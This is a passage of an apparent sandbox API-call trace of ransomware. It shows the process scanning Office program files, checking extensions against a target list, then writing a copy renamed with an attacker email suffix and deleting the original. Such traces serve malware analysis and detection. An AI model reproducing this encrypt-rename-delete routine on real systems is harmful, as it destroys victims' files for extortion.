lpFileSize=0x3a8ff1c*=15776) returned 1 [0272.132] CloseHandle (hObject=0x39c) returned 1 [0272.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll")) returned 0x20 [0272.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.133] lstrlenW (lpString=".doc") returned 4 [0272.133] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.133] lstrlenW (lpString=".docx") returned 5 [0272.133] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0272.133] lstrlenW (lpString=".pdf") returned 4 [0272.133] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.133] lstrlenW (lpString=".xls") returned 4 [0272.133] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.133] lstrlenW (lpString=".xlsx") returned 5 [0272.133] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0272.133] lstrlenW (lpString=".ppt") returned 4 [0272.133] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.133] lstrlenW (lpString=".zip") returned 4 [0272.133] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.133] lstrlenW (lpString=".rar") returned 4 [0272.133] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.133] lstrlenW (lpString=".bz2") returned 4 [0272.133] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.133] lstrlenW (lpString=".7z") returned 3 [0272.133] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.133] lstrlenW (lpString=".dbf") returned 4 [0272.134] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.134] lstrlenW (lpString=".1cd") returned 4 [0272.134] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.134] lstrlenW (lpString=".jpg") returned 4 [0272.134] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.134] lstrlenW (lpString=".doc") returned 4 [0272.134] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString=".docx") returned 5 [0272.134] lstrcmpiW (lpString1=".docx", lpString2="0.DLL") returned -1 [0272.134] lstrlenW (lpString=".pdf") returned 4 [0272.134] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString=".xls") returned 4 [0272.134] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString=".xlsx") returned 5 [0272.134] lstrcmpiW (lpString1=".xlsx", lpString2="0.DLL") returned -1 [0272.134] lstrlenW (lpString=".ppt") returned 4 [0272.134] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.134] lstrlenW (lpString=".zip") returned 4 [0272.134] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString=".rar") returned 4 [0272.134] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.134] lstrlenW (lpString=".bz2") returned 4 [0272.134] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.134] lstrlenW (lpString=".7z") returned 3 [0272.134] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.135] lstrlenW (lpString=".dbf") returned 4 [0272.135] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.135] lstrlenW (lpString=".1cd") returned 4 [0272.135] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.DLL") returned 61 [0272.135] lstrlenW (lpString=".jpg") returned 4 [0272.135] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.135] lstrcmpiW (lpString1=".HLP", lpString2=".USA") returned -1 [0272.135] lstrlenW (lpString="ACTIP10.HLP") returned 11 [0272.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.142] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=343520) returned 1 [0272.142] CloseHandle (hObject=0x388) returned 1 [0272.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp")) returned 0x20 [0272.163] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\actip10.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.276] lstrlenW (lpString=".doc") returned 4 [0272.276] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0272.276] lstrlenW (lpString=".docx") returned 5 [0272.277] lstrcmpiW (lpString1=".docx", lpString2="0.HLP") returned -1 [0272.277] lstrlenW (lpString=".pdf") returned 4 [0272.277] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0272.277] lstrlenW (lpString=".xls") returned 4 [0272.277] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0272.277] lstrlenW (lpString=".xlsx") returned 5 [0272.277] lstrcmpiW (lpString1=".xlsx", lpString2="0.HLP") returned -1 [0272.277] lstrlenW (lpString=".ppt") returned 4 [0272.277] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0272.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.277] lstrlenW (lpString=".zip") returned 4 [0272.277] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0272.277] lstrlenW (lpString=".rar") returned 4 [0272.277] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0272.277] lstrlenW (lpString=".bz2") returned 4 [0272.277] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0272.277] lstrlenW (lpString=".7z") returned 3 [0272.277] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0272.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.277] lstrlenW (lpString=".dbf") returned 4 [0272.277] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0272.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.277] lstrlenW (lpString=".1cd") returned 4 [0272.277] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0272.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.277] lstrlenW (lpString=".jpg") returned 4 [0272.277] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0272.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.277] lstrlenW (lpString=".doc") returned 4 [0272.278] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0272.278] lstrlenW (lpString=".docx") returned 5 [0272.278] lstrcmpiW (lpString1=".docx", lpString2="0.HLP") returned -1 [0272.278] lstrlenW (lpString=".pdf") returned 4 [0272.278] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0272.278] lstrlenW (lpString=".xls") returned 4 [0272.278] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0272.278] lstrlenW (lpString=".xlsx") returned 5 [0272.278] lstrcmpiW (lpString1=".xlsx", lpString2="0.HLP") returned -1 [0272.278] lstrlenW (lpString=".ppt") returned 4 [0272.278] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0272.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.278] lstrlenW (lpString=".zip") returned 4 [0272.278] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0272.278] lstrlenW (lpString=".rar") returned 4 [0272.278] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0272.278] lstrlenW (lpString=".bz2") returned 4 [0272.278] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0272.278] lstrlenW (lpString=".7z") returned 3 [0272.278] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0272.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.278] lstrlenW (lpString=".dbf") returned 4 [0272.278] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0272.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.278] lstrlenW (lpString=".1cd") returned 4 [0272.278] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0272.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACTIP10.HLP") returned 59 [0272.278] lstrlenW (lpString=".jpg") returned 4 [0272.278] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0272.279] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.279] lstrlenW (lpString="DBWIZ.VSL") returned 9 [0272.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.357] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=164216) returned 1 [0272.358] CloseHandle (hObject=0x394) returned 1 [0272.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl")) returned 0x20 [0272.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.360] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.360] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.361] GetLastError () returned 0x0 [0272.361] ReadFile (in: hFile=0x3b4, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x28178, lpOverlapped=0x0) returned 1 [0272.364] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x28180, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x28180, lpOverlapped=0x0) returned 1 [0272.367] ReadFile (in: hFile=0x3b4, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.367] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0272.367] SetEndOfFile (hFile=0x390) returned 1 [0272.367] CloseHandle (hObject=0x390) returned 1 [0272.367] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.367] SetEndOfFile (hFile=0x3b4) returned 1 [0272.372] CloseHandle (hObject=0x3b4) returned 1 [0272.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.372] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dbwiz.vsl")) returned 1 [0272.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.372] lstrlenW (lpString=".doc") returned 4 [0272.372] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.372] lstrlenW (lpString=".docx") returned 5 [0272.372] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1 [0272.373] lstrlenW (lpString=".pdf") returned 4 [0272.373] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString=".xls") returned 4 [0272.373] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.373] lstrlenW (lpString=".xlsx") returned 5 [0272.373] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1 [0272.373] lstrlenW (lpString=".ppt") returned 4 [0272.373] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.373] lstrlenW (lpString=".zip") returned 4 [0272.373] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.373] lstrlenW (lpString=".rar") returned 4 [0272.373] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString=".bz2") returned 4 [0272.373] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString=".7z") returned 3 [0272.373] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.373] lstrlenW (lpString=".dbf") returned 4 [0272.373] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.373] lstrlenW (lpString=".1cd") returned 4 [0272.373] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.373] lstrlenW (lpString=".jpg") returned 4 [0272.373] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.373] lstrlenW (lpString=".doc") returned 4 [0272.373] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.373] lstrlenW (lpString=".docx") returned 5 [0272.374] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1 [0272.374] lstrlenW (lpString=".pdf") returned 4 [0272.374] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.374] lstrlenW (lpString=".xls") returned 4 [0272.374] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.374] lstrlenW (lpString=".xlsx") returned 5 [0272.374] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1 [0272.374] lstrlenW (lpString=".ppt") returned 4 [0272.374] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.374] lstrlenW (lpString=".zip") returned 4 [0272.374] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.374] lstrlenW (lpString=".rar") returned 4 [0272.374] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.374] lstrlenW (lpString=".bz2") returned 4 [0272.374] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.374] lstrlenW (lpString=".7z") returned 3 [0272.374] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.374] lstrlenW (lpString=".dbf") returned 4 [0272.374] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.374] lstrlenW (lpString=".1cd") returned 4 [0272.374] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.374] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0272.374] lstrlenW (lpString=".jpg") returned 4 [0272.374] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.374] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.375] lstrlenW (lpString="DWGDPRES.DLL") returned 12 [0272.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.375] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=16224) returned 1 [0272.375] CloseHandle (hObject=0x3b4) returned 1 [0272.376] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll")) returned 0x20 [0272.376] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgdpres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.376] lstrlenW (lpString=".doc") returned 4 [0272.376] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.376] lstrlenW (lpString=".docx") returned 5 [0272.376] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.376] lstrlenW (lpString=".pdf") returned 4 [0272.376] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.376] lstrlenW (lpString=".xls") returned 4 [0272.376] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.376] lstrlenW (lpString=".xlsx") returned 5 [0272.376] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.376] lstrlenW (lpString=".ppt") returned 4 [0272.376] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.376] lstrlenW (lpString=".zip") returned 4 [0272.376] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.376] lstrlenW (lpString=".rar") returned 4 [0272.376] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.376] lstrlenW (lpString=".bz2") returned 4 [0272.376] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.376] lstrlenW (lpString=".7z") returned 3 [0272.377] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.377] lstrlenW (lpString=".dbf") returned 4 [0272.377] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.377] lstrlenW (lpString=".1cd") returned 4 [0272.377] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.377] lstrlenW (lpString=".jpg") returned 4 [0272.377] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.377] lstrlenW (lpString=".doc") returned 4 [0272.377] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString=".docx") returned 5 [0272.377] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.377] lstrlenW (lpString=".pdf") returned 4 [0272.377] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString=".xls") returned 4 [0272.377] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString=".xlsx") returned 5 [0272.377] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.377] lstrlenW (lpString=".ppt") returned 4 [0272.377] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.377] lstrlenW (lpString=".zip") returned 4 [0272.377] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString=".rar") returned 4 [0272.377] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.377] lstrlenW (lpString=".bz2") returned 4 [0272.377] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.378] lstrlenW (lpString=".7z") returned 3 [0272.378] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.378] lstrlenW (lpString=".dbf") returned 4 [0272.378] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.378] lstrlenW (lpString=".1cd") returned 4 [0272.378] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGDPRES.DLL") returned 60 [0272.378] lstrlenW (lpString=".jpg") returned 4 [0272.378] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.378] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.378] lstrlenW (lpString="EAWFINTL.DLL") returned 12 [0272.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.378] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=51600) returned 1 [0272.378] CloseHandle (hObject=0x3b4) returned 1 [0272.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll")) returned 0x20 [0272.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft 